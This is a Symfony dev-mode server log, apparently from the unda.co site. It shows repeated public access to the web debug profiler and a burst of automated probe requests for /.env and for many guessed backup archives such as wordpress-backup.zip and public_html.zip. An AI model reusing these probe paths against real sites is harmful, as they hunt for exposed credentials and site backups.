[2025-12-20 17:39:09] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"95e6d7","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/95e6d7","method":"GET"} []
[2025-12-20 17:39:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32afde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32afde?panel=router","method":"GET"} []
[2025-12-20 17:39:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 17:39:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f7acf9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f7acf9?panel=security","method":"GET"} []
[2025-12-20 17:39:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 17:46:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"75151e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/75151e","method":"GET"} []
[2025-12-20 17:46:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 17:48:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21?panel=request","method":"GET"} []
[2025-12-20 17:48:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 17:53:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc?panel=request","method":"GET"} []
[2025-12-20 17:53:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 17:53:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee0387","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee0387?panel=request","method":"GET"} []
[2025-12-20 17:53:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 17:59:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 17:59:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-20 18:05:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //auth.unda.co/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //auth.unda.co/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:11:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"228acc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/228acc","method":"GET"} []
[2025-12-20 18:11:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 18:12:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42","method":"GET"} []
[2025-12-20 18:12:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 18:12:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 18:14:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=form","method":"GET"} []
[2025-12-20 18:14:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 18:19:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:19:25] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 18:19:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 18:19:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 18:19:25] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 18:19:25] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 18:19:25] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 18:19:25] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 18:19:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 18:20:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"acf638","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/acf638?panel=form","method":"GET"} []
[2025-12-20 18:20:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 18:20:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:25:10] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 18:27:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=cache","method":"GET"} []
[2025-12-20 18:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 18:28:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"51ec68","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/51ec68?panel=exception","method":"GET"} []
[2025-12-20 18:28:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-20 18:30:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webapps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webapps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /subdomain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /subdomain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domains.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domains.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /websites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /websites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /www.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /www.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public_html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public_html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /root.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /root.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wwwroot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wwwroot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clients.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clients.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /inetpub.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /inetpub.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
